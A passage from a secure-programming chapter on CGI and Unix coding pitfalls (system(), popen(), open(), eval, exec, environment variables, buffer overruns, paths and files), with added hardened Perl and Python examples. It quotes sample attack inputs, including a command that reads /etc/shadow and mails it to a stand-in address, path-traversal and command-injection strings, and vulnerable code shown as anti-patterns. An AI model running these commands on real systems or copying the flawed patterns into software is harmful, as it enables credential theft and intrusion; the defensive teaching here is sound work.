  Languages and libraries are carefully scrutinized, but security issues within 
  them surface periodically. If your tools are flawed, even your best efforts will 
  fail. 

• Flawed code—Even if you have flawless tools, you must know how to properly 
  use them. Some programming languages enforce strict guidelines whereas 
  others don’t (C as opposed to Perl, for example), but most employ only cursory 
  security checks on your code—if any at all. That means that you (and not the 
  compiler or interpreter) are ultimately responsible for ensuring that your code 
  enhances (or at worst, does not impede or degrade) system security. 

• Environment—Even if you use flawless tools and employ them properly, 
  unexpected contingencies can arise. Environment is a good example. Attackers or 
  even coworkers can maliciously or unwittingly alter the environment, and by 
  doing so, materially alter your program’s execution and performance. 


The best advice, therefore, is to choose one language, learn it well, and stay current 
on all security issues relevant to it. Beyond that, this chapter covers some common 
programming errors, means of avoiding them, and tools to help you in that regard. 


Spawning Shells 


Several functions spawn shells or otherwise execute programs: 

• system() 
• popen() 
• open() 
• eval 
• exec 

Avoid these functions in CGI. The following sections illustrate why. 


Executing Shell Commands with system() 


Two risky programming practices are 

• Constructing internal command lines using user input 
• Executing shell commands from within C, PHP, or Perl 


Programmers often perform these tasks using the system() function. system() is 
available via the standard library (stdlib.h) and provides a mechanism to execute a 
shell command from a C or C++ program. As explained in the system() Section (3) 
man page: 


system() executes a command specified in string by calling /bin/sh -c string, and returns 
after the command has been completed. 


Do not use system() in the following: 

• Publicly accessible programs, or scripts on your Web host 
• SGID programs or scripts 
• SUID programs or scripts 


Here’s why: Attackers can execute shell commands by piggybacking your system() 
call, either by manipulating environment variables or pushing metacharacters or 
additional commands onto the argument list. 


In particular, you should always avoid giving attackers an opportunity to pass 
metacharacters to any function that calls a shell. Table 12.1 lists common 
metacharacters in various shells. 


TABLE 12.1 Various Metacharacters in bash, csh, and ksh 

Purpose                          bash        csh         ksh 
Append output to a file          >>          >>          >> 
Append STDERR and STDOUT         N/A         >>&         >& 
Command separator                ;           ;           ; 
Command substitution             `...`       `...`       `...` 
Execute in background            &           &           & 
Group commands                   ()          ()          () 
History substitution             ![job #]    ![job #]    %[job #] 
Home directory symbol            ~           ~           ~ 
Literal (but not $ or `)         "..."       "..."       "..." 
Literal quote                    '...'       '...'       '...' 
Logical AND                      &&          &&          && 
Logical OR                       ||          ||          || 
Match multiple characters        *           *           * 
Match a single character         ?           ?           ? 
Match one character from a set   [...]       [...]       [...] 
Path break symbol                /           /           / 
Pipe                             |           |           | 
Redirect input to a line         <<          <<          << 
Redirect input                   <           <           < 
Redirect output                  >           >           > 
Redirect STDERR and STDOUT       2>          >&          N/A 
Variable substitution            ${...}      $           ${...} 





system(), by the way, is available in one form or another in all full-fledged 
languages. To appreciate the danger of this, consider the PHP-based application 
PhpSmsSend. As described in its documentation 
(http://freshmeat.net/projects/phpsmssend/), PhpSmsSend is 


...a frontend to the SmsSend application. It consists of a .php file, from which you select one 
of the available scripts, and then you can send an SMS wherever you want, all around the 
world. 


No one would question that PhpSmsSend is a useful application. Short Message 
Service to GSM mobile phones is one popular way to exploit new telephone 
technology and incorporate it with the Web. However, in late January 2002, independent 
researcher Indra Kusuma demonstrated that PhpSmsSend had a critical hole. 


The offending code was 

$str = SMSSEND." ".SCRIPTSPATH.$script." $params -- -d @ ".PROXY; 
system($str,$res); 

Attackers who sent commands enclosed in backticks could execute any command 
that the host server supported. For example 


cat /etc/shadow | mail samshacker@samspublishing.com 


NOTE 

system() can be attacked in other ways, too. On some systems, local attackers can alter the 
Input Field Separator shell variable to break up paths in your system() function into separate 
commands. 


In Perl, system() is even more dangerous, because Perl slurps up additional 
commands ad infinitum, even when these are separated by white space. For this 
reason, you should never build a command line with user input for handling by 
system(). 


This is so even if you think you’ve found a solution to control what gets read into 
STDIN. For example, some Webmasters present the user with check boxes, radio lists, 
or other read-only clickable elements that have predefined values. This isn’t safe, 
either. Nothing prevents a cracker from downloading the HTML source code, altering 
the predefined values, and submitting the form. 


popen() in C and C++ 


popen() is available via the standard I/O library (stdio.h) and provides a mechanism 
to execute a shell command from a C or C++ program. As explained in the popen 
Section 3 man page: 


The popen function opens a process by creating a pipe, forking, and invoking the shell. As a 
pipe is by definition unidirectional, the type argument might specify only reading or writing, 
not both; the resulting stream is correspondingly read-only or write-only. The command 
argument is a pointer to a null-terminated string containing a shell command line. This command 
is passed to /bin/sh using the -c flag; interpretation, if any, is performed by the shell. 


Do not use popen() in the following: 

• Publicly accessible programs or scripts on your Web host 
• SGID programs or scripts 
• SUID programs or scripts 


popen() invites various attacks, the most serious of which is that attackers can use 
metacharacters to trick popen() into invoking alternate commands. This problem 
crops up more often than you'd think, even in professionally developed applications. 
For example, a historical RSI Advise team report described an IRIX vulnerability to 
BUGTRAQ about autofsd: 


autofsd is an RPC server which answers file system mount and umount requests from the 
autofs file system. It uses local files or name service maps to locate file systems to be 
mounted. Upon receiving a map argument from a client, the server will attempt to verify if it 
is executable or not. If autofsd determines the map has an executable flag, the server will 
append the client’s key and attempt to execute it. By sending a map name that is executable 
on the server, and a key beginning with a semicolon or a newline followed by a command, 
unprivileged users can execute arbitrary commands as the superuser. The problem occurs 
when the server appends the key to the map and attempts to execute it by calling popen(). 
Because popen() executes the map and key you specify by invoking a shell, it is possible to 
force it into executing commands that were not meant to be executed. (RSI.0010.10-21- 
98.IRIX.AUTOFSD, http://geek-girl.com/bugtraq/1998_4/0142.html) 


Also, like system(), popen() is vulnerable to environment variable attacks. Local 
attackers might be able to pass commands to the shell or launch malicious programs 
by altering the Input Field Separator, $HOME, and $PATH environment variables. 


To foil such attacks, you can access, manipulate, and hard-code shell environment 
variables from C with the following functions, all available from the standard library 
(stdlib.h): 

• getenv()—Use getenv() to get an environment variable. 
• putenv()—Use putenv() to either change or add an environment variable. 
• setenv()—Use setenv() to either change or add an environment variable. 


Just how hardcore an approach to take on environment variables is debatable, but 
remember that your C program inherits its environment variables from the shell by 
which it was executed. By not specifying sensitive variables, you can inadvertently 
allow attackers to materially affect your program’s execution. (Gene Spafford and 
Simson Garfinkel, authors of Web Security and Commerce, recommend cleaning the 
environment completely and explicitly creating a new one.) 
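An added example, not from the book, that puts together the two defenses this chapter has argued for so far: running a helper without /bin/sh -c, so that the Table 12.1 metacharacters in user input are delivered as a literal argument rather than parsed, and handing the child a rebuilt environment (the Spafford and Garfinkel approach) in which PATH is hard-coded and IFS and LD_PRELOAD are simply absent. Python's subprocess stands in for the fork/exec pair a C program would use; the child program, hostile parent environment and user input are all constructed. 

```python
import subprocess
import sys

# Everything the child may inherit from the caller. IFS is deliberately not
# on the list, and PATH is pinned rather than copied.
SAFE_ENV_KEYS = ("HOME", "LANG", "TZ")
HARDCODED_PATH = "/usr/bin:/bin"


def clean_environment(inherited):
    """Build a fresh environment from scratch: copy only allow-listed
    variables from the inherited one, then set PATH to a fixed value."""
    env = {k: v for k, v in inherited.items() if k in SAFE_ENV_KEYS}
    env["PATH"] = HARDCODED_PATH
    return env


def run_without_shell(argv, env):
    """Execute argv directly. No shell ever sees the line, so backticks,
    semicolons and pipes in an argument cannot start a second command."""
    result = subprocess.run(argv, env=env, capture_output=True, text=True, check=True)
    return result.stdout


# Constructed child program: it reports exactly what it received, standing
# in for whatever helper (ps, sendmail, an SMS gateway script) a CGI spawns.
CHILD = ("import os, sys; print(sys.argv[1]); "
         "print(os.environ.get('PATH')); print('IFS' in os.environ); "
         "print('LD_PRELOAD' in os.environ)")


def demo(user_input, hostile_parent_env):
    """Feed an untrusted argument and a tampered parent environment through
    both defenses; return what the child observed."""
    env = clean_environment(hostile_parent_env)
    out = run_without_shell([sys.executable, "-c", CHILD, user_input], env)
    argv_seen, path_seen, ifs_present, preload_present = out.splitlines()
    return argv_seen, path_seen, ifs_present == "True", preload_present == "True"
```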


Table 12.2 describes important shell variables and what they represent. 


TABLE 12.2 bash Environment Variables and What They Mean 

Variable    Purpose 

$-          Stores the current shell’s flags. 

$!          Stores the PID of the last command executed in the background. 

$#          Stores the number of positional parameters ($1, $2, $3, and so on). 

$$          Stores the PID of the current shell. 

$0          Stores the name of the program currently being executed. 

$CDPATH     Identifies the search path used when you issue the cd (change directory) 
            command. 

$HOME       Identifies the location of your home directory. 

$IFS        The Internal Field Separator stores the character used for field separation. 

$LIBPATH    Identifies the search path for shared libraries. 

$LOGNAME    Stores your username. 

$MAIL       Stores the location of your mailbox. (From this, the shell knows where to find 
            your mail.) 

$PATH       Stores a list of all directories the shell will search when looking for commands. 

$PS1        Identifies what your system prompt will look like. For example, on my 
            machine, the PS1 variable is set to $. 

$SHACCT     Stores a filename (a file which is writable by the current user) that stores an 
            accounting record of all shell procedures. 

$SHELL      Stores the shell’s path. 

$TERM       Identifies the current terminal type. Your terminal type can be very important. 
            Unix uses this to determine how many characters and lines to display per 
            screen. 

$TIMEOUT    Stores the number of minutes of inactivity before the shell exits. 

$TZ         Identifies the current time zone. 





From C, you can access the total environment (all variables currently set) using 
environ. As explained in the environ (5) man page: 


An array of strings called the ‘environment’ is made available by exec(2) when a process 
begins. By convention these strings have the form 'name=value'. 


In the Unix Programming FAQ, Andrew Gierth offers a sample program that grabs all 
currently set environment variables and prints them out (similar to printenv and 
env) using environ: 


#include <stdio.h> 

extern char **environ; 

int main(void) 
{ 
    char **ep = environ; 
    char *p; 

    /* Walk the NULL-terminated array of "name=value" strings */ 
    while ((p = *ep++)) 
        printf("%s\n", p); 
    return 0; 
} 


In Perl, hard-code your environment variables at the top before processing data like 
this: 


$ENV{"HOME"} = 'your_desired_home'; 
$ENV{"PATH"} = 'your_desired_path'; 
$ENV{"IFS"} = ''; 


Failure to specify environment variables (or check their length) can result in C/C++ 
buffer overflows. Consider UnixWare 7, for example. In February 2002, a researcher 
going by the handle JeGalGhongMyeung alerted the security community to a serious 
hole in the Caldera UnixWare Message Catalog. 


As per Caldera’s advisory, available for download at 
ftp://stage.caldera.com/pub/security/unixware/CSSA-2002-SCO.3/erg711179.Z: 


The library functions that manipulated message catalogs could be subverted via environment 
variables to use a user’s own message catalogs, possibly causing a set{uid,gid} program to 
memory fault, allowing the possibility of a privilege escalation vulnerability. 


Some other examples: 

• SAS SASTCPD, February 2002—sastcpd (which installed itself suid root, or set 
  user ID root) passed unfiltered environment variables directly to an execve call. 
  Attackers could exploit this to execute commands. 

• Chinput input character system for Linux, February 2002—Attackers could 
  shotgun the system with an exceptionally long $HOME environment variable 
  string. This caused a buffer overflow (and Chinput is suid root). 

• IMLib2, January 2002—Imlib2, a Linux/Unix graphics library, was linked to 
  many setuid programs. If attackers flooded $HOME with unusually large strings 
  (greater than 4,128 characters), a buffer overflow ensued. 

• OpenSSH, December 2001—If attackers created a bogus local library, they could 
  flush its value/location into LD_PRELOAD, and OpenSSH would load it. This led 
  to root access. 

• Oracle DBSNMP, August 2001—Attackers could overflow $ORACLE_HOME, leading 
  to administrative access. Although this bug is old, many folks still use Oracle 8 
  and have no idea that this problem exists. 


Many vendors and developers aren’t aware of such holes, and even when they 
become aware of them, they often take considerable time to correct them. In this 
respect—incredibly—you'll often see a better and quicker response from smaller firms 
than from larger ones. If someone finds a hole in your software, fix the problem 
immediately (and graciously thank them for bringing it to your attention). 
One example of an appropriate response came from Stephane Daury on Netjuke. 
Netjuke is a Web-based audio streaming jukebox powered by PHP 4, and handles 
MP3, Ogg Vorbis, and other digital music formats. It also supports language packs 
(English, French), multilevel security, shared and private play lists, random play lists, 
images, and so on. 


In early February 2002, independent researchers demonstrated that remote attackers 
could flood the variable $section and by doing so, execute arbitrary commands on 
the target system. On being notified, Daury fixed the problem just 30 minutes later. 


open() 
open() is a native Perl function that opens files. As explained in the Perl perlfunc 
documentation, open() 


...opens the file whose filename is given by EXPR, and associates it with FILEHANDLE. If
FILEHANDLE is an expression, its value is used as the name of the real filehandle wanted.


However, you can also use open() to open a process (a command): 


If you open a pipe on the command -, as in either |- or -|, then there is an implicit fork
done, and the return value of open is the pid of the child within the parent process, and 0
within the child process.


Here’s an example of using open() to open a file for processing: 


# %contents holds the parsed CGI parameters (populated elsewhere in the script)
open(DATABASE, "mydatabase.txt") || die "Cannot open mydatabase.txt: $!";
while (<DATABASE>) {
    if (/$contents{'search_term'}/gi) {
        $count++;
        @fields = split('\!\:\!', $_);      # records are delimited by "!:!"
        print "$fields[1] $fields[2] $fields[3]\n";
    }
}
close(DATABASE);


Here’s an example of using open() to open a process: 


open(PS, "ps|") || die "Cannot open PS\n$!";
while (<PS>) {
    if (/pppd/) {
        $count++;
        @my_ppp = split(' ', $_);       # first field of ps output is the PID
        kill 1, $my_ppp[0];             # send SIGHUP to that PID
        print "Your PPP process [PID $my_ppp[0]] has been terminated!\n";
    }
}
close(PS);
if ($count == 0) {
    print "There is no PPP process running right now\n";
}


Here’s an example of opening a process with open() without invoking the shell: 


# "-|" forks: in the child (where open returns 0) we exec ps directly, with no
# shell in between; the parent reads the child's output through PS.
open(PS, "-|") || exec("ps", "ea");
while (<PS>) {
    if (/pppd/) {
        $count++;
        @my_ppp = split(' ', $_);
        kill 1, $my_ppp[0];
        print "Your PPP process [PID $my_ppp[0]] has been terminated!\n";
    }
}
close(PS);
if ($count == 0) {
    print "There is no PPP process running right now\n";
}


A practical example that recently surfaced was Matrix’s CGI Vault Last Lines 2.0 on
Apache 1.3.17, 1.3.18, 1.3.19, 1.3.20, and 1.3.22. Last Lines CGI is a free, Perl-based
CGI tool from Matrix Vault. It prints x number of lines from a specified log file to a
specified Web page. The script doesn’t filter metacharacters properly, and therefore
enables remote users to examine any Web-readable directory.


BrainRawt detailed the problem on December 30, 2001, and the offending code was 
here: 


# $unix_dir = "path/here";
# $error_log is input by the user of the script.
# Two-argument open(): the string is parsed for mode characters, so user input
# can turn it into a pipe.
open(FILE, "$unix_dir/$error_log");


As BrainRawt wrote: 


This script improperly filters in the input, allowing the traditional ../../../../../ path
traversal chars, in return allowing the user to leave the hard coded $unix_dir and view any
file readable by the Web server.

EX: ../../../../../../etc/motd

This script is also missing a < in the open() function which will allow us to execute any
command on that remote server that the Web server has permission to execute.

EX: path/to/error_log;command arg1|


But problems inherent in invoking the shell with open() aren’t limited to Perl. 
Exercise care when performing these tasks in any language. For example, even in 
Python, if you fail to apply adequate controls, you'll see equally negative results with 
os.system() and os.popen(). 


eval (Perl and shell) 


eval is a function available in shells and Perl, typically invoked as eval expression. 
As explained in the Perl documentation: 


EXPR [expression] is parsed and executed as if it were a little Perl program. It is executed in
the context of the current Perl program, so that any variable settings, subroutines, or format
definitions remain afterwards. The value returned is the value of the last expression evaluated,
or a return statement might be used, just as with subroutines.


eval will execute commands, all arguments passed to such commands, and even 
additional, sequential, or piped commands. Using eval is therefore quite risky, and 
offers attackers an opportunity to try a wide range of attacks. 


exec() in Perl 


The exec() function enables you to execute external commands. As explained in the 
perlfunc documentation: 


The exec() function executes a system command AND NEVER RETURNS. Use the system() 
function if you want it to return. If there is more than one argument in LIST, or if LIST is an 
array with more than one value, it calls execvp(3) with the arguments in LIST. If there is 
only one scalar argument, the argument is checked for shell metacharacters. If there are any, 
the entire argument is passed to /bin/sh -c for parsing. 


This is risky. exec will execute the command, all arguments passed to it, and even 
additional, sequential, or piped commands. For this reason, if you use exec (not 
recommended), enclose each individual argument in quotes, like this: 


exec 'external_program', 'arg1', 'arg2';


This will prevent attackers from passing arguments or commands onto the list. 
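The following is an added example, not the book’s code nor the Last Lines script’s, of how the log-printing pattern discussed above can be written so that neither the path-traversal nor the missing-mode problem arises, and how an external program is run with the list form the exec() discussion recommends. The log directory and the allowlist of log names are assumptions made for the example.

```perl
#!/usr/bin/perl -T
# Added example: a hardened rewrite of the "print the last N lines of a log"
# pattern. Not the book's code. The log directory and the allowlist of
# permitted log names are hypothetical.
use strict;
use warnings;

# Taint mode (-T) refuses to pass tainted data to open(), system() or exec()
# and insists on a hardcoded PATH before any child process is started.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

my $LOG_DIR = '/var/log/httpd';                          # hypothetical, absolute
my %ALLOWED = map { $_ => 1 } qw(error_log access_log);  # hypothetical allowlist

# Map a user-supplied name onto a permitted absolute path, or return undef.
# Only \w characters are accepted, so "../", ";" and "|" cannot appear; the
# regex capture is also what untaints the value under -T.
sub safe_log_path {
    my ($name) = @_;
    return undef unless defined $name;
    my ($clean) = $name =~ /^(\w+)$/ or return undef;
    return undef unless $ALLOWED{$clean};
    return "$LOG_DIR/$clean";
}

# Return the last $n lines of $path. Three-argument open() with an explicit
# '<' mode treats the string purely as a filename: unlike the two-argument
# form, a leading '<', '>' or '|', or a trailing '|', is never interpreted.
sub last_lines {
    my ($path, $n) = @_;
    open(my $fh, '<', $path) or return undef;   # caller reports $!
    my @tail;
    while (my $line = <$fh>) {
        push @tail, $line;
        shift @tail if @tail > $n;
    }
    close($fh);
    return \@tail;
}

# If an external program must be run, use the list form: each element is one
# argv entry and no shell is involved, so metacharacters stay literal.
sub tail_without_shell {
    my ($path, $n) = @_;
    my $count = (defined $n && $n =~ /^(\d{1,4})$/) ? $1 : 10;   # validate, untaint
    return system('/usr/bin/tail', '-n', $count, $path) == 0;
}

# Entry point: in a real CGI the two values come from the parsed query string.
my $path  = safe_log_path($ARGV[0]) or die "Rejected log name\n";
my $lines = last_lines($path, 20)   or die "Cannot open $path: $!\n";
print @$lines;
```

Because the shebang carries -T, run it as perl -T script.pl when testing from the command line; otherwise Perl reports "Too late for -T".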
Buffer Overruns


Buffer overruns are still another example of how user input can materially alter your 
program’s execution and performance. When you write C programs, be sure to use 
routines that provide buffer boundary checking. If you don’t, attackers might be able 
to overrun the buffer, causing your program to fault. This can offer attackers an 
opportunity to execute malicious code. 


For example, consider gets(). gets() is available via the standard I/O library 
(stdio.h), and provides a mechanism to read a line of user input. As explained in 
the fgetc man page: 


gets() reads a line from stdin into the buffer pointed to by s until either a terminating
newline or EOF, which it replaces with '\0'. No check for buffer overrun is performed.


Here’s an example of gets() in use where the character buffer is set to 20: 


/* gets_example.c - Why not to use gets() */
#include <stdio.h>

int main(void) {
    char username[20];

    printf("Please enter your username: ");
    gets(username);            /* no bound: writes past username[] on long input */
    printf("%s\n", username);
    return 0;
}


When run, gets_example reads in username and spits it back out: 


linux6$ gets_example
Please enter your username: anonymous
anonymous
linux6$


But what if the user doesn’t enter 20 characters or fewer? What if the user floods
gets_example with garbage like this:


linux6$ gets_example
Please enter your username: anonymousaaaaaaaaaaaaaaaaso55555555555555555555555555555555555555555
anonymousaaaaaaaaaaaaaaaaso55555555555555555555555555555555555555
Bus error (core dumped)
linux6$


Or even this:


linux6$ gets_example
Please enter your username: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
linux6$


In both cases, gets_example core dumps, because, as explained in the gets() man
page:

...it is impossible to tell without knowing the data in advance how many characters gets()
will read and ...gets() will continue to store characters past the end of the buffer.


Attackers search high and low for such holes because they can exploit them to run 
malicious code in unintended memory space. 


In addition to gets(), avoid using all the following routines: 


• fscanf()—fscanf() reads input from the stream pointer stream. In many
instances, you can use fgets() instead.

• realpath()—realpath() expands all symbolic links and resolves references to
/./, /../, and extra / characters in the null terminated string named by path.

• scanf()—scanf() reads input from the standard input stream stdin. Try using
fgets() first to get the string, and then use sscanf() on it.

• sprintf()—sprintf() writes to the character string str, but does not check
the string’s length. Try snprintf() instead.

• strcat()—strcat() concatenates two strings (and appends the src string to
the dest string), but does not check string length. Use strncat() instead.

• strcpy()—strcpy() copies a string pointed to by src to the array pointed to
by dest, but does not check string length. Use strncpy() instead.


A sobering example of how buffer overruns can jeopardize your system is the
sperl5.003 bug. suidperl is a tool for securely running setuid Perl scripts. CERT
reported that


Due to insufficient bounds checking on arguments which are supplied by users, it is possible
to overwrite the internal stack space of suidperl while it is executing. By supplying a carefully
designed argument to suidperl, intruders might be able to force suidperl to execute arbitrary
commands. As suidperl is setuid root, this might enable intruders to run arbitrary
commands with root privileges.


The problem arose in a function using sprintf(). To see a detailed analysis of that
hole (and test attack code that demonstrates how attackers exploit buffer overruns),
go to http://www.ryanspc.com/exploits/perl.txt.


Other interesting recent examples include the following: 


• Microsoft Telnet Server, February 2002—A buffer overflow here (Windows 2000
and Interix) will not only kill the Telnet server, but also enable remote attackers
to execute system-level commands, such as delete, erase, rmdir, and
so on.

• Common Unix Printing System, February 15, 2002—CUPS has a scheduler, and
within the scheduler is a source file named jobs.c. This file uses strcat()
(mentioned previously as a function not to use) to copy a name attribute. It has
no limit on the name, and thus offers an overflow to remote attackers. By
exploiting this, attackers can execute code on the target.

• Apple QuickTime, February 8, 2002—Remote attackers can overflow the
Content-Type header buffer, thus leading to elevated privileges and perhaps
other nasty things.

• Oracle 9iAS Apache PL/SQL Module—Oracle 9iAS ships with a PL/SQL Apache
module that provides Database Access Descriptor (DAD) management facilities.
On or about December 20, 2001, David Litchfield of NGSSoftware identified a
buffer overflow. This could lead to remote attackers executing code on the
target.


Even Apache suffered an overflow of this type. In September 2001, an individual 
who gave only an e-mail address identified the problem in Windows 98 Apache 1.3 
(only on Win32). When attackers sent a URL consisting of 200 forward slashes (/), 
Apache Win32 would expose directory contents. Apache’s team fixed it in version 
1.3.21. 


Check the following links to learn more about buffer overflows: 


• Libsafe—Tim Tsai and Navjot Singh wrote the HTML and source code for this
loadable library: http://www.avayalabs.com/project/libsafe/index.html.

• ITS4—Crispin Cowan and the folks at Software Security Group Cigital Designs
designed this bounds-checking tool to scan C source code for vulnerabilities:
http://www.cigital.com/its4/.

• StackGuard—Automatic Adaptive Detection and Prevention of Buffer-Overflow
Attacks; Crispin Cowan, Calton Pu, Dave Maier, Heather Hinton, Jonathan
Walpole, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle and Qian Zhang;
Department of Computer Science and Engineering, Oregon Graduate Institute
of Science & Technology.
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/usenixsc98_html/.

• Bounds Checking Projects, Greg McGary.
http://gcc.gnu.org/projects/bp/main.html.

• “Attack Class: Buffer Overflows,” Evan Thomas. University of British Columbia.
http://www.cosc.brocku.ca/~cspress/HelloWorld/1999/04-apr/attack_class.html.

• “Smashing the Stack for Fun and Profit,” Aleph One (excerpted from Phrack 49).
http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/profit.html.

• “How to Write Buffer Overflows,” by Mudge of L0pht Heavy Industries.
http://www.insecure.org/stf/mudge_buffer_overflow_tutorial.html.

• “Buffer Overruns, What’s the Real Story?,” by Lefty (lefty@sliderule.geek.org.uk).
http://crack.sh/hack/buffer%20overruns,%20whats%20the%20real%20story.htm.

• “Stack Smashing Vulnerabilities in the Unix Operating System,” Nathan P.
Smith, Computer Science Department, Southern Connecticut State University.
http://destroy.net/machines/security/.

• “Finding and Exploiting Programs with Buffer Overflows,” by prym
(prym@sunflower.org). http://destroy.net/machines/security/buffer.txt.

• “Compromised—Buffer—Overflows, from Intel to SPARC Version 8.” Mudge.
http://www.atstake.com/research/advisories/1996/bufitos.pdf.

• “An Empirical Study in the Reliability of UNIX Utilities.” Barton P. Miller, David
Koski, Ravi Murthy, Cjin Pheow Lee, Vivekananda, Ajitkumar Natarajan, Jeff
Steidl, Computer Science Department, University of Wisconsin.
ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.ps.Z.


Handling User Input 


You can never anticipate every possible combination of characters in a user’s input. 
Most users will input appropriate strings (or those they think are appropriate). But 
crackers will try exotic combinations, looking for weaknesses in your program. To 
guard against such attacks, take the following steps: 


• Ensure that your code uses only those routines that check for buffer length. Or,
if it contains routines that don’t, insert additional code that does.

• Ensure that you explicitly specify environment variables, initial directories, and
paths.

• Subject your code to rigorous testing. Try overflowing the stack, pushing additional
commands onto the argument list, and so on. Essentially, try cracking
your own program.

• In Perl scripts, screen out metacharacters by enforcing rules that allow only
words, as in tr/^[\w ]//g. Note: many tutorials suggest that you explicitly
define forbidden characters (that which is not expressly denied is permitted).
Try to avoid doing this. The favored approach is to explicitly define approved
characters instead (that which is not expressly permitted is denied). This
method is more reliable.

• Also, use taintperl, which forbids the passing of variables to system functions.
taintperl can be invoked in Perl 4 by calling /usr/bin/taintperl, and in Perl
5 by using the -T option when invoking Perl, as in #!/usr/bin/perl -T.
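As an added example (not the book’s code), here are the approved-character screen and the forbidden-character screen the list above contrasts, run side by side against a small set of constructed hostile inputs, which is the "try cracking your own program" step in miniature. The screen uses a substitution rather than the book’s tr///, and the length limit and test strings are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example (not the book's code): the approved-character screen beside the
# forbidden-character screen the text warns against, plus a self-test that
# feeds both a constructed corpus of hostile input.
use strict;
use warnings;

my $MAX_LEN = 64;   # limit length in the code, not merely check it

# Approved-character approach: keep word characters and spaces, drop the rest,
# then truncate. (The book shows this with tr///; a substitution is used here
# because tr/// understands character ranges, not the \w class.)
sub screen_allow {
    my ($s) = @_;
    $s =~ s/[^\w ]//g;
    return substr($s, 0, $MAX_LEN);
}

# Forbidden-character approach: strip a fixed list of "known bad" shell
# metacharacters and hope the list is complete. Present only for comparison.
sub screen_deny {
    my ($s) = @_;
    $s =~ s/[;|&<>`\$]//g;
    return $s;
}

# Would this string still be unsafe to hand to a shell, a filename or SQL?
sub looks_dangerous {
    my ($s) = @_;
    return 1 if length($s) > $MAX_LEN;
    return $s =~ /[^\w ]/ ? 1 : 0;
}

# Constructed corpus: what a cracker types, not what ordinary users type.
my @hostile = (
    "alice",                    # benign baseline
    "alice; id",                # command chaining
    "../../../../etc/motd",     # path traversal, as in the Last Lines bug
    "alice\nid",                # newline: missing from most forbidden lists
    "alice\0.txt",              # NUL byte: truncates the string later, in C
    "a" x 5000,                 # length flood
);

# Run the corpus through one screen and return the inputs it let through.
sub leaks_for {
    my ($screen) = @_;
    return [ grep { looks_dangerous($screen->($_)) } @hostile ];
}

my $allow_leaks = leaks_for(\&screen_allow);   # nothing survives
my $deny_leaks  = leaks_for(\&screen_deny);    # traversal, newline, NUL and flood survive
printf "approved-character screen let through:  %d of %d\n",
    scalar @$allow_leaks, scalar @hostile;
printf "forbidden-character screen let through: %d of %d\n",
    scalar @$deny_leaks, scalar @hostile;
```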


NOTE 


Note that merely checking buffer length is a dicey practice. Ensure that you also limit buffer 
length in your code. 


Paths, Directories, and Files 


When writing CGI programs, always specify absolute paths. This will prevent attackers
from tricking your script into executing an alternate program with the same
name.


For example, never do anything like this: 


# set up a directory variable
$DIR = `pwd`;
chop($DIR);
# and then later on...
sub some_function {
    open(EXTERNAL_SCRIPT, "$DIR/myprogram.pl|");
}


Never use relative paths, either. Relative paths point to locations relative to the 
current directory. Consider this script: 


open(DATABASE, "search/data/clients.dat");
while (<DATABASE>) {
    if (/$contents{'search_term'}/gi) {
        $count++;
        @fields = split('\!\:\!', $_);
        print "$fields[5] $fields[6] $fields[7]<br>\n";
    }
}
close(DATABASE);
if ($count < 1) {
    print "No matches!\n";
}

This doesn’t identify a hard path. If you moved this script, the path leading to 
clients.dat would change: 


• In /var/http, the script points to /var/http/search/data/clients.dat.

• In /etc/http, the script points to /etc/http/search/data/clients.dat.


Instead, point to the absolute path, like this: 


open(DATABASE, "/var/http/ourcompany.net/search/data/clients.dat");
while (<DATABASE>) {
    if (/$contents{'search_term'}/gi) {
        $count++;
        @fields = split('\!\:\!', $_);
        print "$fields[5] $fields[6] $fields[7]<br>\n";
    }
}
close(DATABASE);
if ($count < 1) {
    print "No matches!\n";
}

This way, there’s no ambiguity. The script points to one file only:
/var/http/ourcompany.net/search/data/clients.dat.


Never deviate from this rule, even when launching simple programs. For example, 
suppose you did this: 


system("date"); 


or even this: 

$mydate = `date`;

If an attacker can alter $PATH and point to an alternate date, your script will execute 
it. If you're dead set on executing programs in this manner, try this instead: 


system("/bin/date"); 


Or this: 


$mydate = `/bin/date`;


Also, consider hardcoding your initial working directory at startup. For this, use 
chdir. 
chdir()


chdir(), available in C from unistd.h and also a native Perl function, changes the 
current directory. chdir() can return many errors that might alert you to problems, 
such as whether the target actually exists. Also, as an additional measure, consider 
following your chdir() with an lstat(). This will verify that the target is actually a 
directory, as opposed to a symbolic link. 


Files 


If your CGI programs create or open files, observe these rules: 


• Always include error-handling code to warn you if the file isn’t actually a file,
cannot be created or opened, already exists, doesn’t exist, requires different
permissions, and so on.

• Watch what directories you use to create or open files. Never write a file to a
world-writable or world-readable directory.

• Always explicitly set the file’s UMASK.

• Set file permissions as restrictively as possible. If the file is a dump of user
input, such as a visitor list, the file should be readable only by the processes
that will engage that file.

• Ensure that the file’s name does not have metacharacters in it, and if the file is
generated on-the-fly, include a screening process to weed out such characters.
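The following added example (not the book’s code) puts the chdir() advice and the file rules above into one small script that records visitors in a private file: it hardcodes and verifies its working directory with lstat(), screens a generated file name, sets the umask, creates the file exclusively and reports every failure mode. The directory, the file-name scheme and the use of O_NOFOLLOW (a Linux/BSD flag) are assumptions made for the example.

```perl
#!/usr/bin/perl
# Added example (not the book's code): a CGI helper that appends to a private
# visitor file, applying the chdir()/lstat() advice and the file rules above.
# The working directory and the file-name scheme are hypothetical.
use strict;
use warnings;
use Errno qw(EEXIST);
use Fcntl qw(O_WRONLY O_CREAT O_EXCL O_APPEND O_NOFOLLOW);

my $WORK_DIR = '/var/www/ourcompany.net/data';   # hypothetical, absolute

# Hardcode the working directory at startup and check what we landed in.
# lstat() reports a symlink as a symlink rather than following it.
sub enter_work_dir {
    my ($dir) = @_;
    my @st = lstat($dir) or die "lstat $dir: $!\n";    # does it exist at all?
    die "$dir is a symbolic link\n"  if -l _;
    die "$dir is not a directory\n"  unless -d _;
    die "$dir is world-writable\n"   if $st[2] & 0002;  # never write into such a place
    chdir($dir) or die "chdir $dir: $!\n";
}

# Names generated on the fly are screened first: a short run of word
# characters only, so no '/', '..', shell metacharacters or NUL bytes.
sub safe_name {
    my ($raw) = @_;
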